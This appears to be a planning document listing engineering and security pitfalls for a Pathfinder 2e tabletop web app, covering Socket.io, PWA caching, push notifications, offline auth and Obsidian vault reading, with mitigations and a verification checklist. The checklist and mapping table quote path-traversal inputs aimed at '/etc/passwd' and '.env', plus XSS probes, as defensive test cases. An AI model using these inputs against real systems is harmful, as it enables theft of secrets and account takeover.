  • No soft-delete on user-facing entities

Phase to address: All phases that add new tables (Level-Up: LevelUpSession; PWA: PushSubscription; Battle: BattleEffect; Dice/Chat: RollLog, ChatMessage)


Pitfall 17: Per-event JWT validation overloads the gateway

What goes wrong: Codebase already has characters.gateway.ts doing JWT verification on connect. As new events are added (dice:roll, chat:send, battle:effect:apply), devs add per-event auth checks that re-decode the JWT every time. CPU spikes during a busy combat round (10+ events/sec).

Why it happens: "Belt and suspenders" mindset. JWT verify is fast (microseconds) but at scale it accumulates.

How to avoid:

  • Validate JWT once on connect (already done). Store the userId on the socket: socket.data.userId
  • Per-event handlers read socket.data.userId — no re-decode
  • Authorization (does this user have rights to this action?) is per-event, but uses the cached userId — only DB lookups for role/membership, no JWT work
  • Add token-revocation table check ONLY on connect, not per event. Acceptable trade-off: revoked token stays valid until disconnect (~minutes to hours).
  • Implement a server-side "kick" admin action that disconnects sockets by userId for emergency revocation

Warning signs:

  • CPU spike during high-event-rate moments
  • Repeated JWT verify calls in profiler output
  • Adding new events requires copy-pasting auth code

Phase to address: Cross-cutting (Battle-Multi-Screen, Dice/Chat, GM-Live-Tools all add new events)


Pitfall 18: WebSocket room cleanup leaks on disconnect

What goes wrong: Existing connectedClients Map (already noted in CONCERNS.md) grows because disconnects don't always remove entries cleanly. Add Battle rooms, Roll-Log rooms, Chat rooms → multiple maps, multiple leak paths. Server memory grows monotonically.

Why it happens: Custom client tracking duplicates Socket.io's built-in room tracking. Disconnect handler forgets one of the maps.

How to avoid:

  • Remove the custom connectedClients Map. Use Socket.io rooms exclusively. Rooms auto-cleanup on disconnect.
  • For "is user X online" queries, use io.in(user:${userId}).fetchSockets() rather than a custom map
  • Single disconnect handler does all cleanup; never spread cleanup across feature modules
  • Add a periodic health check that logs io.sockets.sockets.size — alert if it grows unboundedly

Warning signs:

  • connectedClients.size > sockets.size (drift)
  • Memory usage trends up over multi-day sessions
  • "Phantom" online users

Phase to address: Battle-Multi-Screen (when adding battle rooms + display rooms)


Pitfall 19: Mobile device sleeps during session, missing push and breaking WebSocket

What goes wrong: Player puts phone face-down on table. Phone sleeps after 30s. WebSocket disconnects. GM sends "Würfel Reflex-Save" push. Phone is asleep — push wakes it briefly, notification appears in tray, but the app's WebSocket is still disconnected. Player taps notification, app opens, but the app shows stale state because the reconnect-and-refetch flow takes 3+ seconds.

Why it happens: Mobile OSes aggressively suspend background tabs and apps. WebSocket through a sleeping phone is dead. Push wakes the OS but not the app's network state.

How to avoid:

  • When visibilitychange fires with document.visibilityState === "visible", immediately: check WebSocket connection state, reconnect if needed, refetch current campaign + battle state via REST
  • Show a clear "Verbinde wieder..." indicator during reconnect, hide all stale data behind it
  • Wake Lock API for active turn: when it's the player's turn, acquire a wake lock so screen stays on. Release when turn ends. Document battery impact.
  • Push payload includes an action field: notification tap deep-links to the relevant page (battle, dice prompt, chat) so reconnect happens at the right place
  • Service worker handles push by displaying the notification AND optionally updating an IndexedDB queue of pending actions, so when the app reopens, it knows what was pending
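The resync decision itself can stay a pure function so it is testable without a browser. A sketch — the action names are hypothetical; the caller would wire this to the document's visibilitychange event and the Socket.io client:

```typescript
type ResyncAction = 'show-reconnect-banner' | 'reconnect-socket' | 'refetch-state';

// Decide what to do when the app returns to the foreground.
// Pure and testable; event wiring and the REST refetch live in the caller.
function resyncActions(
  visibility: 'visible' | 'hidden',
  socketConnected: boolean
): ResyncAction[] {
  if (visibility !== 'visible') return []; // nothing to do while hidden
  if (socketConnected) return ['refetch-state']; // socket alive, state may still be stale
  // Socket died while the phone slept: hide stale data, reconnect, then refetch.
  return ['show-reconnect-banner', 'reconnect-socket', 'refetch-state'];
}

const afterSleep = resyncActions('visible', false);
const stillConnected = resyncActions('visible', true);
```

Keeping the branching out of the event handler makes the "stale data hidden before reconnect" ordering a unit-testable invariant rather than an accident of handler code.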

Warning signs:

  • "I tapped the push but the app is in the wrong place"
  • Stale data on app reopen
  • Battery drain (over-eager wake lock or polling)

Phase to address: PWA / Mobile-First polish


Pitfall 20: Reconnect storm when Wi-Fi at the table flaps

What goes wrong: Wi-Fi at the gaming table briefly drops (router hiccup, neighbor microwaving). All 5 player phones + GM laptop + table display all disconnect simultaneously. Wi-Fi recovers. All 7 clients try to reconnect at the same moment. With Socket.io's default backoff, they all hit the server within 1 second. Server is fine for 7 clients, but if the server is also doing CPU-heavy work (e.g., translation API, DB query), the spike causes a cascade of slow connects, ack timeouts, more retries.

Why it happens: Same network, same event → synchronized reconnects. No jitter in the backoff.

How to avoid:

  • Configure Socket.io client with randomized backoff: reconnectionDelay: 1000, reconnectionDelayMax: 5000, randomizationFactor: 0.5
  • Server: rate-limit connection attempts per IP (the existing concern in CONCERNS.md flags this — fix in this milestone since we're adding more event load)
  • Connection State Recovery cushions the impact: if the disconnect was < 2min, the recovered session reuses state, no full re-init needed
  • Separate "static asset" CDN/path from API path so SW can serve cached UI even when API is overloaded
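The effect of those client options can be reasoned about with a pure function — a sketch that approximates Socket.io's backoff (exponential growth, ± randomizationFactor jitter, capped at the max); the library's internal jitter formula may differ slightly:

```typescript
// Approximate reconnect delay for a given attempt, mirroring the options
// reconnectionDelay (base), reconnectionDelayMax (max), randomizationFactor.
function reconnectDelay(
  attempt: number,             // 0-based reconnect attempt
  base = 1000,                 // reconnectionDelay
  max = 5000,                  // reconnectionDelayMax
  randomizationFactor = 0.5,
  rand: number = Math.random() // injectable for tests
): number {
  const raw = base * Math.pow(2, attempt);
  // rand = 0 → full negative jitter, rand = 1 → full positive jitter
  const jittered = raw + (rand * 2 - 1) * randomizationFactor * raw;
  return Math.min(jittered, max);
}

const earliest = reconnectDelay(0, 1000, 5000, 0.5, 0); // 500ms
const capped = reconnectDelay(3, 1000, 5000, 0.5, 0.5); // raw 8000 → capped 5000
```

The property that matters: seven clients reconnecting after the same flap land spread across a 500-1500ms window on the first attempt instead of hitting the server in the same instant.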

Warning signs:

  • All clients lose connection at once and recovery is slow
  • Server logs show simultaneous connect bursts
  • Long "Verbinde..." spinner after a brief outage

Phase to address: Battle-Multi-Screen (where reconnect resilience matters most), Mobile/PWA


Minor Pitfalls

Pitfall 21: Manifest icon traps (maskable, sizes, splash)

What goes wrong: Android shows a white square inside the app icon (because non-maskable icon used in maskable slot). iOS doesn't show a splash screen (because no apple-touch-icon link tags or apple-touch-startup-image). PWA looks unprofessional or non-installable.

How to avoid:

  • Provide both "any" and "maskable" icon variants. Maskable icons must have safe-zone padding (icon content within 80% diameter circle).
  • Sizes required: 192x192, 512x512, plus apple-touch-icon 180x180
  • iOS splash screens are device-specific; use a generator or a single-image fallback
  • Test on real iOS Safari + Android Chrome before claiming "PWA-ready"
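A minimal manifest icon block covering both variants might look like this (file names are placeholders — a config sketch, not the app's actual manifest):

```json
{
  "icons": [
    { "src": "/icons/icon-192.png", "sizes": "192x192", "type": "image/png", "purpose": "any" },
    { "src": "/icons/icon-512.png", "sizes": "512x512", "type": "image/png", "purpose": "any" },
    { "src": "/icons/maskable-512.png", "sizes": "512x512", "type": "image/png", "purpose": "maskable" }
  ]
}
```

The apple-touch-icon is not read from the manifest — iOS needs a separate HTML tag: `<link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">`.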

Phase to address: PWA


Pitfall 22: Chat/roll history queries are not indexed for time-paginated reads

What goes wrong: SELECT * FROM ChatMessage WHERE campaignId = X ORDER BY createdAt DESC LIMIT 50 is fast at 1k messages and slow at 100k — and it is a server hot path during scrollback.

How to avoid:

  • Composite index @@index([campaignId, createdAt(sort: Desc)]) on ChatMessage and RollLog from day one
  • Use cursor-based pagination (WHERE createdAt < cursor ORDER BY createdAt DESC LIMIT 50) not offset-based
  • Optionally archive messages older than 1 year to a separate table (premature for this scale)
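In Prisma schema terms, the composite index is one line per model — a sketch with assumed field names; RollLog gets the same @@index:

```prisma
model ChatMessage {
  id         String   @id @default(cuid())
  campaignId String
  authorId   String
  body       String
  createdAt  DateTime @default(now())

  @@index([campaignId, createdAt(sort: Desc)])
}
```

The matching cursor read in Prisma Client is `findMany({ where: { campaignId, createdAt: { lt: cursor } }, orderBy: { createdAt: 'desc' }, take: 50 })` — the where + orderBy shape is exactly what the composite index serves.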

Phase to address: Dice/Chat


Pitfall 23: "Offline" PWA shows login screen because auth check fails offline

What goes wrong: Player opens app on the train (no Wi-Fi). PWA loads (cached shell), but the auth check (GET /api/auth/me) fails → app redirects to login → login API call also fails → user sees broken login screen and assumes app is dead.

How to avoid:

  • App-shell loads UI optimistically using cached JWT validity (decode locally, check exp)
  • Network errors on auth-check are NOT treated as "logged out" — they're "offline, using last-known identity"
  • Distinct error states: "Nicht eingeloggt" ("not logged in") vs. "Offline — gecachte Daten verfügbar" ("offline — cached data available")
  • Login form shows "Offline" banner if API unreachable, doesn't try to log in
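The local exp check needs no crypto — a sketch; it only distinguishes "offline, using last-known identity" from "logged out" and never replaces server-side signature verification:

```typescript
// Offline plausibility check of a cached JWT: decode the payload locally
// and compare exp. Does NOT verify the signature — the server stays authoritative.
function isTokenPlausiblyValid(token: string, now: number = Date.now()): boolean {
  try {
    const [, payloadB64] = token.split('.');
    const payload = JSON.parse(Buffer.from(payloadB64, 'base64url').toString('utf8'));
    return typeof payload.exp === 'number' && payload.exp * 1000 > now;
  } catch {
    return false; // malformed token → treat as logged out
  }
}

// Demo: a hand-built token with a one-hour exp (signature irrelevant here)
const exp = Math.floor(Date.now() / 1000) + 3600;
const demoToken = [
  'e30', // {} header, base64url
  Buffer.from(JSON.stringify({ exp })).toString('base64url'),
  'sig',
].join('.');
const stillValid = isTokenPlausiblyValid(demoToken);
const garbage = isTokenPlausiblyValid('not-a-token');
```

On a plausibly-valid token the shell renders cached data with the offline banner; on false it shows the login screen.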

Phase to address: PWA


Pitfall 24: Display screen aspect ratio mismatch on the table-embedded screen

What goes wrong: Built and tested on 16:9 laptop. Tabletop screen is some weird embedded panel (maybe 4:3, maybe portrait). Map is cropped or pillarboxed badly. Tokens look wrong.

How to avoid:

  • Display mode uses meta viewport to lock to actual screen pixels
  • Map renders to a fit-to-window container with letterboxing background, not absolute pixels
  • Detect aspect ratio at load and adjust default zoom; provide GM control to "frame to display"
  • Get the actual screen specs from the user before shipping

Phase to address: Battle-Multi-Screen


Pitfall 25: GM-tool safety — accidental "set HP to 0 for all party"

What goes wrong: GM has bulk-control tools ("apply Frightened to all enemies"). A slip of the mouse targets "all party" instead of "all enemies". The whole party drops to 0 HP with conditions piled on. Without confirmation and undo, that mis-click is a mid-fight disaster.

How to avoid:

  • Destructive bulk actions require confirmation modal naming the affected entities
  • All GM-live-tool actions run in a transaction that emits a single broadcast — recoverable by an undo (Ctrl-Z) that reverts the whole transaction
  • Keep an in-memory "last action" stack (last 5 actions) on GM client with one-click undo
  • High-impact actions (set HP to 0, kill, end battle) require a typed confirmation — e.g. "ALLE TÖTEN" ("KILL ALL") must be typed
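The escalation logic is a small pure function — a hypothetical sketch; the action names and the typed phrase are illustrative, not the app's real API:

```typescript
type Confirmation =
  | { level: 'none' }
  | { level: 'modal'; entities: string[] }          // modal naming affected entities
  | { level: 'typed'; phrase: string; entities: string[] }; // must type the phrase

// Decide which confirmation a bulk GM action requires.
function requiredConfirmation(action: string, targets: string[]): Confirmation {
  const lethal = action === 'set-hp-0' || action === 'kill' || action === 'end-battle';
  if (lethal) return { level: 'typed', phrase: 'ALLE TÖTEN', entities: targets };
  if (targets.length > 1) return { level: 'modal', entities: targets };
  return { level: 'none' };
}

const lethalBulk = requiredConfirmation('set-hp-0', ['Mira', 'Thorn']);
const singleTarget = requiredConfirmation('apply-condition', ['Goblin 3']);
const bulkCondition = requiredConfirmation('apply-condition', ['Goblin 1', 'Goblin 2']);
```

Keeping the rule in one function means the confirmation policy can be unit-tested instead of being re-implemented per button.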

Phase to address: GM-Live-Tools


Technical Debt Patterns

| Shortcut | Immediate Benefit | Long-term Cost | When Acceptable |
|---|---|---|---|
| Client-side dice rolls | Instant feedback, no server roundtrip | Cheating possible, no audit, no replay | Never for canonical rolls — OK as preview/shadow only |
| dangerouslySetInnerHTML for chat markdown | Easy to render, all features work | XSS, account takeover via chat | Never |
| Cache API for authenticated responses | Simple offline support | User-data leak across logins | Never — use user-scoped IndexedDB |
| skipWaiting() + clients.claim() in SW | Instant updates | Mid-session reload kills state | Never in this app |
| Storing final ability score only (no boost history) | Simpler model | Can't undo level-ups, can't audit | Never — store boost decisions |
| Custom connectedClients Map | "Easy" presence tracking | Memory leaks, drift | Never — use io.in(room).fetchSockets() |
| db push instead of prisma migrate dev | Skips writing a migration | Lost migration history, prod drift | Never (already enforced by CLAUDE.md) |
| any types for level-up wizard state | Move fast through prototyping | Bugs in branching wizards are silent | Only for spike branches that get rewritten |
| Reading vault files with raw user paths | Simple implementation | Path traversal | Never |
| Single RollLog table without index | Works at small scale | Slow scrollback at 50k+ rolls | Acceptable until the index strategy is decided in the same phase |

Integration Gotchas

| Integration | Common Mistake | Correct Approach |
|---|---|---|
| Web Push / VAPID | Regenerate VAPID keys on every deploy | Persist keys in .env, treat as secret, document in .env.example |
| Service Worker + Socket.io | Try to handle the WebSocket inside the SW | SW is for static cache + push only; the WebSocket lives in the page and reconnects on visibility |
| iOS PWA Push | Test only in a Safari tab, not the installed PWA | iOS push requires home-screen install + standalone display mode |
| Obsidian vault sync | Read directly from the filesystem during an edit | Vault contents may change mid-read; use a stable snapshot (git ref or mtime guard) |
| Pathbuilder import → in-app level-up | Treat the imported character as authoritative for all levels, then layer level-ups on top | Snapshot the import as level N; persist explicit level-up decisions only for level N+1 onward |
| Claude API (existing) for new content (level-up flavor text) | Add it to the critical path | Cache aggressively, never block UI on translation, fall back to English |
| Postgres + Prisma 7 | Rely on the default Restrict on relations (mysterious failures on parent delete) | Decide explicit onDelete per relation; document it in a schema comment |

Performance Traps

| Trap | Symptoms | Prevention | When It Breaks |
|---|---|---|---|
| Unbounded RollLog query without index | Chat scrollback slows over weeks | Composite index on (campaignId, createdAt DESC); cursor pagination | ~50k rolls per campaign |
| Recursive embed render without depth cap | Some vault notes hang the page | Cycle detection + max depth 3 | One cyclic note in the vault |
| Per-event JWT verify | Server CPU spike during combat rounds | Decode once on connect, cache userId on the socket | ~20 events/sec sustained |
| Broadcast every token nudge | Network thrash, mobile battery drain | Debounce drag events (60ms), emit final position only on drop | Continuous drag at 60fps × N players |
| All clients reconnect at once after a Wi-Fi flap | Server connect-burst lag | Randomized backoff, rate limit | Network flap with 5+ clients |
| Translation lookup on every character read (existing) | Slow character sheet load | Pre-cache on seed, batch missing on load (already in CONCERNS.md) | 50+ unique items per character |
| SW Cache for authenticated API responses | Stale data, leak between users | Don't cache auth responses in the Cache API | First multi-user device |

Security Mistakes

| Mistake | Risk | Prevention |
|---|---|---|
| Display screen authenticated as GM | Player at the table opens DevTools, sees GM-only data | Issue a display-only short-lived token; filter GM data server-side per channel |
| Markdown chat with raw HTML | Account takeover via an injected `<img onerror>` | react-markdown without rehype-raw, a urlTransform, no dangerouslySetInnerHTML |
| Client-rolled dice broadcast as authoritative | Players spoof crits | All rolls server-side with crypto.randomInt; persist the seed |
| Vault path from wikilink not sanitized | Read of /etc/passwd or .env | Resolve, then verify the path starts with the vault root; whitelist extensions |
| JWT in localStorage is XSS-readable | Stolen token | Already a known risk; mitigate via CSP and sanitizing all user-rendered content. Future: HttpOnly cookie + CSRF |
| Level-up endpoint accepts an arbitrary level value | Player jumps from level 4 to level 20 | Server validates level == currentLevel + 1; multi-level jumps require a GM-approval flag |
| Push notification body contains sensitive data (HP, location) | Notification visible on the lock screen leaks info | Generic notification body ("Eine Aktion erwartet dich" — "an action awaits you"); details only after the app opens |
| Unrestricted vault file size read | OOM via a 1 GB markdown file | Cap reads at 5 MB; refuse larger files and report "file too large" gracefully |
| Display URL shareable | Anyone with the URL sees the battle | Display URL contains a short-lived token that expires when the battle ends |
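The wikilink path guard from the table above fits in a dozen lines — a sketch with an assumed vault root and extension allow-list (POSIX paths assumed; adjust both constants to the real config):

```typescript
import * as path from 'node:path';

// Assumptions for illustration — swap in the deployment's actual values.
const VAULT_ROOT = path.resolve('/srv/obsidian-vault');
const ALLOWED_EXT = new Set(['.md', '.png', '.jpg', '.jpeg', '.webp']);

// Returns the absolute path if the request stays inside the vault, else null.
function resolveVaultPath(requested: string): string | null {
  const resolved = path.resolve(VAULT_ROOT, requested);
  // startsWith with a trailing separator also rejects siblings like /srv/obsidian-vault2
  if (!resolved.startsWith(VAULT_ROOT + path.sep)) return null; // traversal attempt
  if (!ALLOWED_EXT.has(path.extname(resolved).toLowerCase())) return null;
  return resolved;
}

const safe = resolveVaultPath('notes/session-1.md');
const traversal = resolveVaultPath('../../etc/passwd');
const envGrab = resolveVaultPath('../.env');
```

Resolving first and comparing the normalized result is the important part — string-filtering ".." before resolution misses encoded and mixed-separator variants.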

UX Pitfalls

| Pitfall | User Impact | Better Approach |
|---|---|---|
| Push permission prompt on first load | User reflexively denies → stuck on "denied" | Ask after an explicit user opt-in tap; explain why |
| "Update available" banner during an active battle | Disrupts the session if a reload triggers | Suppress during active battles; queue for afterwards |
| Level-up UI loses state on accidental tab close | Player redoes 20 minutes of choices | Persist wizard state at every step; reload resumes |
| Dice roll result appears in chat while the page is on a different tab | Player misses the outcome | Service worker push + tab-title flash + sound (opt-in) |
| Display screen shows its last frame after a disconnect | GM thinks the display is fine; players see frozen state | Disconnect overlay on the display screen with a reconnect indicator |
| Vault note rendering shows raw [[wikilinks]] on parse failure | Player sees broken syntax | Graceful fallback: render as text + warning icon, not as broken markdown |
| Wake lock always on | Phone overheats, battery drains | Wake lock only during the active turn; release on turn end |
| Boost UI accepts duplicate boosts in the same set | Player applies all 4 to STR | Greyed-out / disabled state with a tooltip explaining why |
| Cached character sheet offline shows old HP | Player thinks they have HP they don't | Mark it "Offline — letzte Aktualisierung vor X Min" ("offline — last updated X min ago") |

"Looks Done But Isn't" Checklist

Things that appear complete in dev but fail in real use.

  • PWA Install: Often missing maskable icons, splash screens, and apple-touch-icon — verify on real iOS + Android, not just Lighthouse
  • Web Push: Often missing 410-Gone cleanup — verify expired subs are pruned by sending a test push to a re-installed browser
  • Offline mode: Often missing offline auth fallback — verify cold-load on airplane mode shows app, not login error
  • Service Worker update: Often missing manual update prompt — verify deploy of new version doesn't auto-reload mid-session
  • Display screen: Often leaks GM data via unfiltered WebSocket frames — verify with socket.onAny(console.log) in incognito
  • Dice rolls: Often computed client-side — verify server-side roll by intercepting the fetch and changing the result; UI must reject
  • Chat markdown: Often allows javascript: URLs — verify [click](javascript:alert(1)) is neutralized
  • Level-up boost: Often missing 18-cap rule — verify boosting a stat at 18+ adds +1, not +2
  • Level-up undo: Often loses dependent feats — verify retraining a prereq feat surfaces broken downstream feats
  • Skill increase: Often loses history — verify undo of a level-15 increase knows which skill was chosen
  • Wikilink resolution: Often picks first match silently — verify ambiguous links are surfaced
  • Embed loops: Often crash on cyclic vault — verify with a deliberately cyclic test vault
  • Path traversal: Often allows .. — verify ?path=../../server/.env is rejected
  • Reconnect: Often loses missed messages — verify chat sent during a 30s disconnect appears after reconnect
  • Push payload: Often contains sensitive data — verify lock-screen notification doesn't leak HP/location
  • Backups: Often missing for VAPID keys + JWT_SECRET — verify they're in the .env.example doc and the deployment runbook
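The javascript:-URL check from the list above is a few lines — a sketch of the kind of urlTransform react-markdown accepts; the protocol allow-list is an assumption:

```typescript
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

// Returns '' (renders as a dead link) for anything outside the allow-list.
function sanitizeUrl(url: string): string {
  try {
    // The base URL makes relative links parseable; its host is a throwaway.
    const parsed = new URL(url, 'https://placeholder.invalid/');
    return SAFE_PROTOCOLS.has(parsed.protocol) ? url : '';
  } catch {
    return ''; // unparseable → dead link
  }
}

const blocked = sanitizeUrl('javascript:alert(1)');
const allowed = sanitizeUrl('https://example.com/map.png');
const relative = sanitizeUrl('notes/session-1');
```

Parsing with the URL constructor (instead of a regex on "javascript:") also catches whitespace, casing, and encoding tricks the naive check misses.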

Recovery Strategies

When pitfalls slip through, here's how to recover.

| Pitfall | Recovery Cost | Recovery Steps |
|---|---|---|
| VAPID key lost / rotated | HIGH | Notify all users; ask each to disable + re-enable notifications in settings (resubscribes); accept silent failure for users who don't act |
| Cache leaks user data across logins | MEDIUM | Force SW unregister via a remote-config flag; client clears all caches on next load; bump the SW version to invalidate; rotate the JWT secret if a data leak is suspected |
| Level-up corrupted a character (boost cap or feat dependency) | HIGH | The append-only history table is the lifeline: replay history with corrected logic; without history, manual GM correction via an admin UI |
| Display screen showed GM data | HIGH | Audit server logs for affected battles; rotate display tokens; review WebSocket payloads with a recorded session capture |
| Cheated dice roll detected post-hoc | MEDIUM | Rolls are persisted server-side: the GM can review the log and retroactively correct the affected encounter |
| Reconnect lost a chat message | LOW | A REST endpoint with since=lastSeenId lets the client refetch on reconnect; the user can scroll back |
| SW cached old broken JS that breaks the app | MEDIUM | Add an /api/health/version check; if the returned version differs from the SW-cached version past a threshold, force unregister + reload |
| Wikilink resolution broken by a vault-wide rename | LOW | Re-index the vault on detection; show a "linked notes have moved" warning |
| Embed loop hung the tab | LOW | Hard reload; future loads use cycle detection (one-time fix) |

Pitfall-to-Phase Mapping

How roadmap phases should address these pitfalls.

| Pitfall | Prevention Phase | Verification |
|---|---|---|
| 1. SW cache leaks user data | PWA | Multi-user shared-device test passes |
| 2. Mid-session SW force update | PWA | Deploy during an active local battle test — no reload |
| 3. iOS push silent failure | PWA | iOS PWA install + receive-push test on a real device |
| 4. VAPID key loss | PWA | .env.example documents key persistence; backup runbook exists |
| 5. Display screen GM-data leak | Battle-Multi-Screen | DevTools-on-display test sees no GM-only fields |
| 6. Client-side dice tampering | Dice/Chat | Forge a result client-side; server rejects it |
| 7. Markdown chat XSS | Dice/Chat | Inject `<img onerror>` and `[click](javascript:...)`; both neutralized |
| 8. Boost 18-cap | Level-Up | Unit test: boost STR 18 → STR 19 (not 20) |
| 9. Recompute side effects | Level-Up | Test: level-up at low HP doesn't reset HP to max |
| 10. Feat retrain orphans | Level-Up | Retrain a prereq feat → dependent feats are flagged |
| 11. Skill increase history | Level-Up | Test: undo of the level-15 increase knows which skill |
| 12. Wikilink ambiguity | Obsidian | Test vault with two same-basename notes; ambiguity surfaced |
| 13. Embed loops | Obsidian | Cyclic vault test renders without hanging |
| 14. Vault path traversal | Obsidian | ?path=../../etc/passwd is rejected |
| 15. Socket.io message ordering | Battle-Multi-Screen + Dice/Chat (cross-cutting) | 30s disconnect test: missed events recovered |
| 16. Cascading deletes | All phases adding tables | Schema review: every onDelete documented |
| 17. Per-event JWT overload | Cross-cutting (touched in every event-adding phase) | Profiler shows JWT verify count = connection count, not event count |
| 18. WebSocket room leaks | Battle-Multi-Screen | Memory profile over 24h shows no monotonic growth |
| 19. Mobile sleep / push wakeup | PWA / Mobile-First polish | Push tap deep-links to the correct page on cold start |
| 20. Reconnect storm | Battle-Multi-Screen + PWA | Wi-Fi flap test with 5 clients; staggered reconnect |
| 21. Manifest icon traps | PWA | Install on real iOS + Android; icons render correctly |
| 22. Chat/roll index | Dice/Chat | EXPLAIN ANALYZE on the paginated query shows index use |
| 23. Offline auth fallback | PWA | Airplane-mode cold load shows the app, not a login error |
| 24. Display aspect ratio | Battle-Multi-Screen | Test on the actual table screen |
| 25. GM bulk-action footgun | GM-Live-Tools | Destructive actions require confirmation; undo works |

Cross-Cutting: Phases that Cannot Be Skipped Without Pain

Three patterns must be present in every phase of this milestone:

  1. WebSocket discipline. Each new event needs: server-side validation → server-side persist (if historical) → broadcast (if needed) → client-side reconcile-on-reconnect. Gateway is the bottleneck — make it boringly consistent.

  2. PostgreSQL referential thinking. Each new table needs: explicit onDelete decision, composite indexes for query patterns, transaction wrapping for multi-table writes. The CharactersService (1454 lines, no tests, no transactions) is the cautionary tale.

  3. Test coverage on critical paths. The codebase has zero tests today. Every pitfall above is detectable by a test. The level-up math, the dice parser, the wikilink resolver, the path-traversal guard — these are ALL pure functions or near-pure functions. Test them. The death-spiral logic in HP/Dying/Wounded is already a flagged risk in CONCERNS.md; level-up adds another such mechanism. Don't ship pitfall-prone code with no test net.
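To make the point concrete: the 18-cap boost rule (Pitfall 8) is exactly this kind of pure function — a sketch; the function name is illustrative:

```typescript
// PF2e: an ability boost adds +2 below 18, +1 at 18 or above.
function applyBoost(score: number): number {
  return score >= 18 ? score + 1 : score + 2;
}

const boostedAt16 = applyBoost(16); // 18
const boostedAt18 = applyBoost(18); // 19, not 20
```

Two lines of logic, two assertions — the entire class of "boost 18-cap" regressions becomes impossible to ship silently.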


Sources

PWA / Service Worker / Cache:

iOS Web Push:

Web Push / VAPID:

Wake Lock / Battery:

Socket.io:

PF2e Rules:

Obsidian / Wikilinks:

Markdown XSS:

Prisma / Postgres:

Internal context:

  • .planning/PROJECT.md
  • .planning/codebase/CONCERNS.md (HP/Dying race, oversized service, missing tests, gateway auth minimal)
  • .planning/codebase/TESTING.md (zero test coverage today — directly motivates the cross-cutting test discipline above)
